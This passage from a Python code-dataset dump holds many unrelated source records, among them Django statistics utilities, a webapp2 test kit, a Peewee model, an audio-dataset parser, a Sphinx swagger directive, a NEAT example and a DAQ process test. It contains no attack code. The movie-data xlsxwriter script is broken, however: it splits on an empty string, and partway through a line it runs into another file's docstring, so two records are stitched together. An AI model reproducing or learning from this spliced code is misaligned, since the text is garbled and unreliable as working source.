daily_statistics.content:\n\t\td.daily_statistics=daily_statistics\n\t\td.save()\n\n\tdaily_statistics = get_today_daily_statistics(False)\n\tdaily_statistics.save()\n\tfor d in daily_statistics.content:\n\t\td.daily_statistics=daily_statistics\n\t\td.save()\n\ndef get_daily_statistics(time, is_admin):\n\tnow = datetime.datetime.now()\n\tif((now-time).days==0):\n\t\tdaily_statistics = get_today_daily_statistics(is_admin)\n\telse:\n\t\tdaily_statistics = DailyStatisticsRecord.objects.get(time__day=time.day, is_admin=is_admin)\n\n\treturn daily_statistics\n\ndef get_daily_statistics_set(time, is_admin):\n\tdaily_statistics_set = DailyStatisticsRecord.objects.filter(time__month=datetime.date.today().strftime('%m'), is_admin=is_admin)\n\t#daily_statistics_set = DailyStatisticsRecord.objects.all()\n\treturn daily_statistics_set\n","sub_path":"manager/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"137295300","text":"class Util:\n def parse(self, file):\n print(\"Opening file \" + file)\n f = open(file, \"r\")\n values = []\n if f.mode == 'r':\n lines = f.readlines()\n for line in lines:\n values.append(line.strip())\n f.close()\n return values\n","sub_path":"Day6/Util.py","file_name":"Util.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"201685960","text":"import xlsxwriter\r\nimport os\r\nimport urllib.request\r\nimport base64\r\noutfile = 'movieData.xlsx'\r\n\r\n\r\nos.remove(outfile)\r\nf = open(\"movieNightHTML_src.html\", \"r\")\r\nsplitArr = f.read().split(\"\")\r\n\r\n\r\nworkbook = xlsxwriter.Workbook(outfile)\r\nworksheet = workbook.add_worksheet()\r\n\r\n\r\n\r\ncount = 1\r\nfor element in splitArr:\r\n\threfIndex = element.find(\":\"\n\n Usage:\n\n app = webapp2.WSGIApplication(...)\n\n class TestCase(helper.TestCase):\n\n def testRequestSomething(self):\n result = None\n with self.webservice as http:\n res = requests.get(http + '/path')\n result = res.status_code\n self.assertEqual(result, 200)\n\n \"\"\"\n if isinstance(instance, webtest.TestApp):\n instance = instance.app\n assert isinstance(instance, webapp2.WSGIApplication)\n server = StopableWSGIServer.create(instance)\n host = server.adj.host\n port = server.adj.port\n try:\n cls.notice('Service started on %r' % [host, port])\n yield 'http://%s:%s' % (host, port)\n finally:\n cls.notice('Shutting down service on %r' % [host, port])\n server.shutdown()\n\n @property\n def webservice(self):\n \"\"\"Shortcut for constructing a service thread.\"\"\"\n assert isinstance(self.testapp, webtest.TestApp)\n return self.prepare_webservice(self.testapp.app)\n\n @classmethod\n def setUpClass(cls):\n testbed_options = cls.stub_config or {}\n cls.testbed = Testbed()\n cls.testbed.prepare(stubs=cls.stubs, **testbed_options)\n app = getattr(cls, 'getHandlers', None)\n if callable(app):\n handlers = app()\n if isinstance(handlers, webapp2.WSGIApplication):\n cls.testapp = cls.application(handlers)\n else:\n cls.testapp = cls.application_from(*list(handlers))\n return\n\n def tearDown(self):\n ndb.get_context().clear_cache()\n\n @classmethod\n def tearDownClass(cls):\n cls.testbed.deactivate()\n\n def iter_queue_tasks(self, *queue_names):\n \"\"\"\n Execute the queue. This assumes a sequence is already enqueued.\n\n Because this test environment does not leverage a proper web service\n thread, we simulate the queue-runner here, until the queue is empty.\n \"\"\"\n taskqueue = self.testbed.taskqueue_stub\n while True:\n tasks_performed = 0\n for q in queue_names:\n tasks = taskqueue.get_filtered_tasks(queue_names=q)\n tasks_performed = tasks_performed + len(tasks)\n logging.info('Queue runner found %d tasks' % len(tasks))\n for task in tasks:\n yield (\n q, task)\n\n if not tasks_performed:\n break\n\n def assertResponse(self, response, body=None, response_code=None, content_type=None):\n \"\"\"Shortcut for assessing one or multiple attributes of a response.\"\"\"\n self.assertIsInstance(response, webob.Response)\n if isinstance(response_code, int):\n self.assertEqual(response.status_int, response_code)\n if isinstance(response_code, (list, tuple)):\n self.assertIn(response.status_int, response_code)\n if isinstance(content_type, basestring):\n self.assertEqual(response.content_type, content_type)\n if isinstance(body, basestring):\n self.assertEqual(response.normal_body, body)\n\n\nServiceRequestCase = type('ServiceRequestCase', (TestCase,), {})\n\ndef ApplicationTestCase(application):\n \"\"\"Construct a testcase class based on an application instance.\"\"\"\n\n @classmethod\n def handlers(cls):\n return application\n\n return type('TestCase_Application', (TestCase,), {'getHandlers': handlers})","sub_path":"pycfiles/webapptitude-0.0.10.linux-x86_64.tar/testkit.py","file_name":"testkit.py","file_ext":"py","file_size_in_byte":8260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"404354770","text":"\"\"\"\n Simple database example with Peewee ORM, sqlite and Python\n Here we define the schema\n Use logging for messages so they can be turned off\n\n\"\"\"\nfrom peewee import Model, CharField, BooleanField, DecimalField, SqliteDatabase\nimport logging\n\ndatabase = SqliteDatabase('customer.db')\ndatabase.connect()\ndatabase.execute_sql('PRAGMA foreign_keys = ON;') # needed for sqlite only\n\nclass BaseModel(Model):\n class Meta:\n database = database\n\nclass Customer(BaseModel):\n \"\"\"\n This class defines Customer, which maintains the details of a customer\n at HP Norton\n \"\"\"\n \n id = CharField(primary_key = True, max_length = 5)\n firstname = CharField(max_length = 30)\n lastname = CharField(max_length = 30)\n address = CharField(max_length = 30)\n phone = CharField(max_length = 12) # Format is XXX-XXX-XXXX\n email = CharField(max_length = 30)\n status = BooleanField()\n credit_limit = DecimalField(max_digits = 7, decimal_places = 2)\n","sub_path":"students/gregdevore/lesson04/assignment/customer_model.py","file_name":"customer_model.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"193419820","text":"# Copyright (c) 2011 Benaka Moorthi\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nfrom srmtrainer.gedit.utility import *\n\nfrom gi.repository import Gtk, Gdk\n\nclass TrainerActionGroup(Gtk.ActionGroup):\n\n ACTION_GROUP_ID = 'SRMTrainerActions'\n\n COMPETE = {\n 'id': 'SRMTrainer_Compete',\n 'lbl': 'Compete...',\n 'dsc': 'Compete in the TopCoder Arena using SRMTrainer'\n }\n \n LOADING = {\n 'id': 'SRMTrainer_Loading',\n 'lbl': 'Loading...',\n 'dsc': ''\n }\n \n PRACTICE = {\n 'id': 'SRMTrainer_Practice',\n 'lbl': 'Practice...',\n 'dsc': 'Select a past competition to practice solving'\n }\n\n SRM_TRAINER_MENU_ITEM = {\n 'id': 'SRMTrainer_Main',\n 'lbl': 'SRM Trainer',\n 'dsc': ''\n }\n\n def __init__(self, on_compete, on_practice):\n Gtk.ActionGroup.__init__(self, TrainerActionGroup.ACTION_GROUP_ID)\n\n self.add_action(make_action(TrainerActionGroup.COMPETE, on_compete))\n self.add_action(make_action(TrainerActionGroup.LOADING, None))\n self.add_action(make_action(TrainerActionGroup.SRM_TRAINER_MENU_ITEM, None))\n self.add_action(make_action(TrainerActionGroup.PRACTICE, on_practice))\n\n @property\n def compete_action(self):\n return self.get_action(TrainerActionGroup.COMPETE['id'])\n\n @property\n def loading_action(self):\n return self.get_action(TrainerActionGroup.LOADING['id'])\n\n @property\n def practice_action(self):\n return self.get_action(TrainerActionGroup.PRACTICE['id'])\n\n @property\n def srm_trainer_main_action(self):\n return self.get_action(TrainerActionGroup.SRM_TRAINER_MENU_ITEM['id'])\n\n","sub_path":"src/srmtrainer/gedit/ui/trainer_action_group.py","file_name":"trainer_action_group.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"260866520","text":"from system.gui.widgets.factory import create_widget\nfrom system.gui.utils.grid import grid_configure\nfrom system.scientist.map import algo_config_map, algo_value_map\n\n\nclass SurrogateView:\n\n def __init__(self, root_view):\n self.root_view = root_view\n\n self.widget = {}\n self.label = {}\n\n self.frame = create_widget('frame', master=self.root_view.frame_surrogate, row=0, column=0)\n grid_configure(self.frame, None, 0)\n \n self.widget['name'] = create_widget('labeled_combobox',\n master=self.frame, row=0, column=0, width=20, text=algo_config_map['surrogate']['name'], \n values=list(algo_value_map['surrogate']['name'].values()), required=True)\n\n self.create_frame_param()\n\n self.curr_name = None\n\n self.activate = {\n 'Gaussian Process': self.activate_gp,\n 'Thompson Sampling': self.activate_ts,\n }\n self.deactivate = {\n 'Gaussian Process': self.deactivate_gp,\n 'Thompson Sampling': self.deactivate_ts,\n }\n\n def create_frame_param(self):\n self.frame_param = create_widget('frame', master=self.frame, row=1, column=0, padx=0, pady=0, sticky='NSEW')\n grid_configure(self.frame_param, None, 0)\n\n def select(self, name):\n if name == self.curr_name: return\n if self.curr_name is not None:\n self.deactivate[self.curr_name]()\n self.frame_param.destroy()\n self.create_frame_param()\n self.activate[name]()\n self.curr_name = name\n\n def activate_gp(self):\n self.label['nu'], self.widget['nu'] = create_widget('labeled_combobox',\n master=self.frame_param, row=0, column=0, width=5, text=algo_config_map['surrogate']['nu'], values=[1, 3, 5, -1], class_type='int', return_label=True,\n default=5)\n\n def deactivate_gp(self):\n for key in ['nu']:\n self.label.pop(key)\n self.widget.pop(key)\n\n def activate_ts(self):\n self.label['nu'], self.widget['nu'] = create_widget('labeled_combobox',\n master=self.frame_param, row=0, column=0, width=5, text=algo_config_map['surrogate']['nu'], values=[1, 3, 5, -1], class_type='int', return_label=True,\n default=5)\n self.label['n_spectral_pts'], self.widget['n_spectral_pts'] = create_widget('labeled_entry',\n master=self.frame_param, row=1, column=0, text=algo_config_map['surrogate']['n_spectral_pts'], class_type='int', return_label=True,\n default=100, valid_check=lambda x: x > 0, error_msg='number of spectral sampling points must be positive')\n self.label['mean_sample'], self.widget['mean_sample'] = create_widget('checkbutton',\n master=self.frame_param, row=2, column=0, text=algo_config_map['surrogate']['mean_sample'], return_label=True)\n\n def deactivate_ts(self):\n for key in ['nu', 'n_spectral_pts', 'mean_sample']:\n self.label.pop(key)\n self.widget.pop(key)\n","sub_path":"system/scientist/menu/config/algo_advanced/surrogate/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"154095193","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 18 16:25:36 2021\n\n@author: tobrien\n\nScript for compiling metadata and adding well annotions to denote bad wells\nfor disease modelling work\n\n\"\"\"\n\nimport pandas as pd\nfrom pathlib import Path\nimport re\n\nfrom tierpsytools.hydra.compile_metadata import populate_96WPs,\\\n get_day_metadata, concatenate_days_metadata, day_metadata_check, \\\n number_wells_per_plate\n\ndate_regex = r\"\\d{8}\"\n\nPROJECT_DIRECTORY = Path('/Volumes/behavgenom$/Tom/Data/Hydra/RepeatedBluelight/RawData')\n\n\n#%%\nif __name__ == '__main__':\n\n day_root_dirs = [d for d in (PROJECT_DIRECTORY /\n 'AuxiliaryFiles').glob(\"*\")\n if d.is_dir() and re.search(date_regex, str(d))\n is not None]\n\n print('Calculating metadata for {} days of experiments'.format(\n len(day_root_dirs)))\n\n for count, day in enumerate(day_root_dirs):\n exp_date = re.findall(date_regex, str(day))[0]\n manualmetadata_file = list(day.rglob('*_manual_metadata.csv'))[0]\n assert (exp_date in str(manualmetadata_file))\n wormsorter_file = list(day.rglob('*_wormsorter.csv'))[0]\n assert (exp_date in str(wormsorter_file))\n\n print('Collating manual metadata files: {}'.format(wormsorter_file))\n\n plate_metadata = populate_96WPs(wormsorter_file,\n del_if_exists=True,\n saveto='default')\n\n\n metadata_file = day / '{}_day_metadata.csv'.format(exp_date)\n\n print('Generating day metadata: {}'.format(\n metadata_file))\n\n day_metadata = get_day_metadata(plate_metadata,\n manualmetadata_file,\n saveto=metadata_file,\n del_if_exists=True)\n\n \n files_to_check = day_metadata_check(day_metadata, day, plate_size=48)\n number_wells_per_plate(day_metadata, day)\n\n# %%\n import datetime\n # combine all the metadata files\n concat_meta = concatenate_days_metadata(PROJECT_DIRECTORY / 'AuxiliaryFiles',\n list_days=None,\n saveto=None)\n \n \n concat_meta_grouped = concat_meta.groupby('worm_gene')\n\n strains = pd.DataFrame(concat_meta_grouped.apply(lambda x: x.drop_duplicates(subset='worm_strain')))\n strains.reset_index(drop=True,\n inplace=True)\n \n strains = strains[['worm_gene',\n 'worm_strain',\n 'worm_code',\n 'date_yyyymmdd']]\n \n strains.to_csv(PROJECT_DIRECTORY / \\\n '{}_strain_name_errors.csv'.format(\n datetime.datetime.today().strftime('%Y%m%d')\n ),\n index=False)\n\n#%%\n\nfrom tierpsytools.hydra.match_wells_annotations import import_wells_annotations_in_folder, update_metadata # if your tierpsytools is super up to date, the typo in the first function has been fixed \naux_dir = Path('/Volumes/behavgenom$/Tom/Data/Hydra/RepeatedBluelight/RawData/AuxiliaryFiles')\nannotations_df = import_wells_annotations_in_folder(aux_dir)\nannotations_df.rename(columns={'imgstore_prestim':'imgstore'}, inplace=True)\nannotations_df['is_bad_well'] = annotations_df['well_label'] != 1\nwells_annotated_metadata = update_metadata(aux_dir, annotations_df, del_if_exists=True) ","sub_path":"compile_metadata_and_tierpsy_analysis_files/compile_metadata_and_well_annotations_for_non_standard_video_types.py","file_name":"compile_metadata_and_well_annotations_for_non_standard_video_types.py","file_ext":"py","file_size_in_byte":3526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"201432032","text":"#this source is to get simple ex01.tml\nfrom bs4 import BeautifulSoup\nimport requests\n\n#read file from network, zerobizcoin@nate.com\nbaseurl = 'http://ec2-13-125-20-194.ap-northeast-2.compute.amazonaws.com//quizbot/ex01'\nbaseurl = 'http://13.125.20.194/quizbot/ex01'\n\nhtml = requests.get(baseurl).text\nsoup = BeautifulSoup(html, 'lxml')\n\n#bring text from p tag\nexclass_div = soup.find(\"div\", {'class':'ex_class'})\nmessage_p = exclass_div.find(\"p\")\nprint(message_p.get_text())\n","sub_path":"cr1.py","file_name":"cr1.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"549530659","text":"from django.conf.urls import url\n\nfrom . import views\n\napp_name = 'blog'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'update_responses/', views.update_responses, name='update_responses'),\n url(r'^(?P\\d+)/(?P\\d+)/$', views.getq, name='questions'),\n url(r'postaquestion/', views.postaq, name='postaq'), \n url(r'createprofile/', views.createprofile, name='createprofile'),\n url(r'editprofile/', views.editprofile, name='editprofile'),\n url(r'filter/', views.filter, name='filter'),\n url(r'loginpage/', views.loginpage, name='loginpage'),\n url(r'about/', views.about, name='about'),\n url(r'edit_response/', views.edit_response, name='edit_response'),\n\turl(r'inappropriate_qs/', views.inappropriate_qs, name='inappropriate_qs'),\n\turl(r'inappropriate_rs/', views.inappropriate_rs, name='inappropriate_rs'),\n\turl(r'flagged_users/', views.flagged_users, name='flagged_users'),\n\turl(r'see_user_history/', views.see_user_history, name='see_user_history'),\n\turl(r'admin/', views.admin, name='admin'),\n url(r'hidden_qs/', views.hidden_qs, name='hidden_qs'),\n url(r'hidden_rs/', views.hidden_rs, name='hidden_rs'),\n url(r'mark_response/', views.mark_response, name='mark_response'),\n url(r'flag_response/', views.flag_response, name='flag_response'),\n url(r'flag_question/', views.flag_question, name='flag_question'),\n\turl(r'see_mod_history/', views.see_mod_history, name='see_mod_history'),\n url(r'error/', views.error, name='error'),\n url(r'^(?P.+)/$', views.filtertag, name='filtertag'),\n]\n","sub_path":"tigertalk/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"611704425","text":"# Copyright (C) 2020 Shahin Amiriparian, Michael Freitag, Maurice Gerczuk, Björn Schuller\n#\n# This file is part of auDeep.\n#\n# auDeep is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# auDeep is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with auDeep. If not, see .\n\n\"\"\"Parser for the ComParE 2020 Mask (M) dataset\"\"\"\nimport abc\nfrom pathlib import Path\nfrom typing import Optional, Mapping, Sequence\n\nimport pandas as pd\n\nfrom audeep.backend.data.data_set import Partition\nfrom audeep.backend.log import LoggingMixin\nfrom audeep.backend.parsers.base import Parser, _InstanceMetadata\n\n_COMPARE20_MASK_LABEL_MAP = {\n \"0\": 0,\n \"1\": 1,\n}\n\n\nclass Compare20MaskParser(LoggingMixin, Parser):\n\n def __init__(self, basedir: Path):\n super().__init__(basedir)\n self._metadata_cache = None\n self._audio_dir = basedir / \"wav\"\n\n @abc.abstractmethod\n def label_key(self) -> str:\n pass\n\n def _metadata(self) -> pd.DataFrame:\n if not self.can_parse():\n raise IOError(\"unable to parse the ComParE 2020 Mask dataset at {}\".format(self._basedir))\n if self._metadata_cache is None:\n # Define partition names (according to audio files)\n partitions = ['train', 'devel', 'test']\n\n # Load file list\n label_paths = [self._basedir / \"binary_lab\" / 'labels_{}.tsv'.format(part) for part in partitions]\n self._metadata_cache = pd.concat([pd.read_csv(path, sep='\\t') for path in label_paths])\n\n return self._metadata_cache\n\n def can_parse(self) -> bool:\n metadata_file = self._basedir / \"binary_lab\" / \"labels_devel.tsv\"\n\n if not self._audio_dir.exists():\n self.log.debug(\"cannot parse: audio directory at %s missing\", self._audio_dir)\n\n return False\n\n if not metadata_file.exists():\n self.log.debug(\"cannot parse: metadata file at %s missing\", metadata_file)\n\n return False\n\n return True\n\n @property\n def label_map(self) -> Optional[Mapping[str, int]]:\n if not self.can_parse():\n raise IOError(\"inable to parse the ComParE 2020 Mask dataset at {}\".format(self._basedir))\n\n return _COMPARE20_MASK_LABEL_MAP\n\n @property\n def num_instances(self) -> int:\n if not self.can_parse():\n raise IOError(\"unable to parse the ComParE 2020 Mask dataset at {}\".format(self._basedir))\n\n # test instances are not contained in label tsv file\n return len(list(self._audio_dir.glob(\"*.*\")))\n\n @property\n def num_folds(self) -> int:\n if not self.can_parse():\n raise IOError(\"unable to parse the ComParE 2020 Mask dataset at {}\".format(self._basedir))\n\n return 0\n\n def parse(self) -> Sequence[_InstanceMetadata]:\n if not self.can_parse():\n raise IOError(\"unable to parse the ComParE 2020 Mask dataset at {}\".format(self._basedir))\n\n meta_list = []\n\n metadata = self._metadata()\n\n for file in sorted(self._audio_dir.glob(\"*.wav\")):\n label_nominal = metadata.loc[metadata[\"file_name\"] == file.name][\"label\"]\n\n # test labels are '?'\n if all(l != '?' for l in label_nominal):\n label_nominal = label_nominal.iloc[0]\n else:\n label_nominal = None\n\n instance_metadata = _InstanceMetadata(\n path=file,\n filename=file.name,\n label_nominal=str(label_nominal),\n label_numeric=None, # inferred from label map\n cv_folds=[],\n partition=Partition.TRAIN if file.name.startswith(\"train\") else Partition.DEVEL if file.name.startswith(\n \"devel\") else Partition.TEST\n )\n\n self.log.debug(\"parsed instance %s: label = %s\", file.name, label_nominal)\n meta_list.append(instance_metadata)\n\n return meta_list\n","sub_path":"baseline/hss15.py","file_name":"hss15.py","file_ext":"py","file_size_in_byte":4390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"616101653","text":"# -*- coding: utf-8 -*-\nfrom docutils import nodes\nfrom docutils.parsers.rst import Directive, roles, directives\nfrom sphinxcontrib.httpdomain import HTTPGet\nimport traceback\nimport os\nfrom sphinx.errors import SphinxError\n\nfrom sphinx.locale import _\n\nfrom six.moves.urllib import parse as urlparse # Retain Py2 compatibility for urlparse\nimport requests\nimport json\n\n\nclass SwaggerDocDirective(Directive):\n\n required_arguments = 1\n has_content = False\n final_argument_whitespace = True # Just in case you are storing documents in a path that has whitespace.\n\n def process_source(self, url):\n \"\"\"\n Fetch and parse the JSON containing the `Resource Listing`_.\n \n https://github.com/OAI/OpenAPI-Specification/blob/master/versions/1.2.md#51-resource-listing\n \n Args:\n url (str): HTTP(S) URL or relative/absolute path in the sphinx source folder.\n\n Returns:\n dict: Containing the contents of the resource listing\n \"\"\"\n parsed_url = urlparse.urlparse(url)\n \n if not parsed_url.scheme: # Assume file relative to documentation\n env = self.state.document.settings.env\n relfn, absfn = env.relfn2path(url)\n\n if not os.path.exists(absfn):\n raise self.error(\"File not found: %s\" % absfn)\n\n env.note_dependency(relfn)\n\n with open(absfn) as fd:\n content = fd.read()\n\n return json.loads(content)\n else:\n s = requests.Session()\n r = s.get(url)\n return r.json()\n\n def _field_list_item(self, label, value):\n \"\"\"Convenience method to create field list items.\n \n Args:\n label: Label text \n value: Value text \n\n Returns:\n nodes.Field Item that may be appended to a field list\n \"\"\"\n field = nodes.field()\n field += nodes.field_name(text=label)\n fb = nodes.field_body()\n field += fb\n fb += nodes.paragraph(text=value)\n \n return field\n\n def parameters(self, parameters):\n \"\"\"Yield parameter information as field lists\"\"\"\n fl = nodes.field_list()\n \n for parameter in parameters:\n fl += self._field_list_item(parameter['name'], parameter['description'])\n\n yield fl\n\n def operations(self, operations, path):\n \"\"\"Create nodes for an Operation object which typically represents a single HTTP VERB request to one endpoint.\n \n Args:\n operations (list): List of Operation object as described in \n https://github.com/OAI/OpenAPI-Specification/blob/master/versions/1.2.md#523-operation-object\n path (str): The resource path given from the API Object\n \n Yields:\n nodes\n \"\"\"\n for operation in operations:\n\n if 'method' in operation:\n method = operation['method'].upper()\n elif 'httpMethod' in operation: # Because my vendor is dumb\n method = operation['httpMethod'].upper()\n\n yield nodes.subtitle(text='{} {}'.format(method, path))\n if 'summary' in operation:\n yield nodes.paragraph(text=operation['summary'])\n\n if 'notes' in operation:\n opnote = nodes.note()\n opnote += nodes.paragraph(text=operation['notes'])\n yield opnote\n\n if 'parameters' in operation:\n for parameter in self.parameters(operation['parameters']):\n yield parameter\n\n def api_endpoints(self, api_objects):\n \"\"\"Create nodes for api_objects as a generator.\n \n Args:\n api_objects (list): List of API Objects\n Yields:\n docutils nodes\n \"\"\"\n for api in api_objects:\n print('Creating nodes for API with path: {}'.format(api['path']))\n yield nodes.title(text=api['path'])\n yield nodes.paragraph(text=api['description'])\n\n for operation in self.operations(api.get('operations', []), api['path']):\n yield operation\n\n def create_declaration(self, declaration):\n \"\"\"Create nodes for an API Declaration. This is the root level dict.\n \n Args:\n declaration (dict): The root level of an API Declaration \n\n Returns:\n A section containing the API documentation\n \"\"\"\n s = nodes.section(ids=[declaration['resourcePath']])\n s += nodes.title(text='API')\n\n fl = nodes.field_list()\n if 'swaggerVersion' in declaration:\n fl += self._field_list_item('Swagger', declaration['swaggerVersion'])\n\n if 'apiVersion' in declaration:\n fl += self._field_list_item('API Version', declaration['apiVersion'])\n\n if 'basePath' in declaration:\n fl += self._field_list_item('Base Path', declaration['basePath'])\n\n if 'resourcePath' in declaration:\n fl += self._field_list_item('Resource Path', declaration['resourcePath'])\n\n s += fl\n\n for element in self.api_endpoints(declaration.get('apis', [])):\n s += element\n\n return s\n\n def run(self):\n try:\n source_url = self.arguments[0]\n swaggerdoc = self.process_source(source_url)\n\n return [self.create_declaration(swaggerdoc)]\n except:\n print('Unable to process URL: %s' % self.arguments[0])\n traceback.print_exc()\n error = nodes.error('')\n para = nodes.paragraph()\n para += nodes.Text('Unable to process URL: ')\n para += nodes.strong('', self.arguments[0])\n para += nodes.Text('. Please check that the URL is a valid Swagger api-docs URL and it is accesible')\n error += para\n return [error]\n","sub_path":"sphinxcontrib/swaggerdoc/swagger_doc.py","file_name":"swagger_doc.py","file_ext":"py","file_size_in_byte":5918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"40163598","text":"\"\"\" 2-input XOR example \"\"\"\nfrom __future__ import print_function\n\nimport os\n\nfrom neat import nn, population, statistics\nfrom sklearn.metrics import log_loss\nfrom utils import gen_data\nfrom fitness import *\nimport visualize\n\ninputs,outputs = gen_data()\n# Network inputs and expected outputs.\n\ndef eval_fitness(genomes):\n for g in genomes:\n net = nn.create_feed_forward_phenotype(g)\n mse = 0.0\n for i,o in zip(inputs,outputs):\n output = net.serial_activate(i)\n mse += sum([(i-j)**2 for i,j in zip(o,output)])\n # tot_fit = 0.0\n # for i,expected in zip(inputs,outputs):\n # output = net.serial_activate(i)\n # output = [1 if o>0.5 else 0 for o in output]\n # tot_fit += abs_dis_fitness(output,expected)\n g.fitness = 1- mse\n\nlocal_dir = os.path.dirname(__file__)\nconfig_path = os.path.join(local_dir, 'mul_config')\npop = population.Population(config_path)\npop.run(eval_fitness, 300)\n\nprint('Number of evaluations: {0}'.format(pop.total_evaluations))\n\n# Display the most fit genome.\nwinner = pop.statistics.best_genome()\nprint('\\nBest genome:\\n{!s}'.format(winner))\n\n# Verify network output against training data.\nprint('\\nOutput:')\nwinner_net = nn.create_feed_forward_phenotype(winner)\nfor i, expected in zip(inputs, outputs):\n output = winner_net.serial_activate(i)\n print(\"expected {} got {}\".format(expected, output))\n\n# Visualize the winner network and plot/log statistics.\nvisualize.plot_stats(pop.statistics)\nvisualize.plot_species(pop.statistics)\nvisualize.draw_net(winner, view=True, filename=\"mul.gv\", show_disabled=False, prune_unused=True)\nstatistics.save_stats(pop.statistics)\nstatistics.save_species_count(pop.statistics)\nstatistics.save_species_fitness(pop.statistics)\n","sub_path":"final_proj/src/multiply/mul.py","file_name":"mul.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"219699854","text":"import os\nimport time\nimport logging\nimport unittest\n\nfrom irrad_control import config_path\nfrom irrad_control.utils.tools import load_yaml\nfrom irrad_control.utils.daq_proc import DAQProcess\n\n\nclass BaseDAQProcess(DAQProcess):\n\n def __init__(self):\n super(BaseDAQProcess, self).__init__(name='TestDAQProcess', commands={})\n\n # Define clean up\n def clean_up(self):\n pass\n\n\nclass TestDAQProcess(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n\n # Create process\n cls.daq_proc = BaseDAQProcess()\n\n # Launch process\n cls.daq_proc.start()\n\n # Wait until process is created with irrad.pid file\n start = time.time()\n while not os.path.isfile(os.path.join(config_path, '.irrad.pid')):\n time.sleep(0.2)\n\n # Wait max 5 seconds\n if time.time() - start > 5:\n break\n\n @classmethod\n def tearDownClass(cls):\n # Send SIGTERM\n cls.daq_proc.terminate()\n\n # Wait until down\n cls.daq_proc.join()\n\n # Check pid file is gone\n assert not os.path.isfile(os.path.join(config_path, '.irrad.pid'))\n\n def test_pid_file_content(self):\n\n pid_file_content = load_yaml(os.path.join(config_path, '.irrad.pid'))\n\n # Check that it is not empty\n assert pid_file_content\n\n # Check that values are is not empty\n assert all(pid_file_content.values())\n\n # Check that all ports are found\n assert all(isinstance(port, int) for port in pid_file_content['ports'].values())\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO, format=\"%(asctime)s - %(name)s - [%(levelname)-8s] (%(threadName)-10s) %(message)s\")\n suite = unittest.TestLoader().loadTestsFromTestCase(TestDAQProcess)\n unittest.TextTestRunner(verbosity=2).run(suite)\n","sub_path":"tests/proc/test_daq_proc.py","file_name":"test_daq_proc.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"486530116","text":"from AI.base_ai import BaseAI\r\nfrom AI.ai_config import *\r\nimport random\r\n\r\nclass TeamAI( BaseAI ):\r\n def __init__( self , helper ):\r\n BaseAI.__init__( self , helper )\r\n\r\n def decide( self ):\r\n helper = self.helper\r\n my_pos = helper.getMyPosition()\r\n my_dir = helper.getMyDirection()\r\n res = helper.askGodDirection( \"FoodGod\" )\r\n\r\n if helper.checkMeDead():\r\n return res\r\n\r\n nearest_food = helper.getKNearestFood( my_pos , 1 )\r\n if len( nearest_food ) > 0:\r\n path_to_food = helper.getShortestPath( my_pos , nearest_food[0] , helper.getMyDirection() )\r\n if len( path_to_food ) > 0:\r\n res = path_to_food[0]\r\n \r\n while not helper.checkDirection( res ):\r\n res = helper.askGodDirection( \"FoodGod\" )\r\n\r\n return res\r\n","sub_path":"Pygame/src/AI/teamEating.py","file_name":"teamEating.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"14477420","text":"import six\nfrom sklearn.metrics import make_scorer\n\nfrom . import (\n 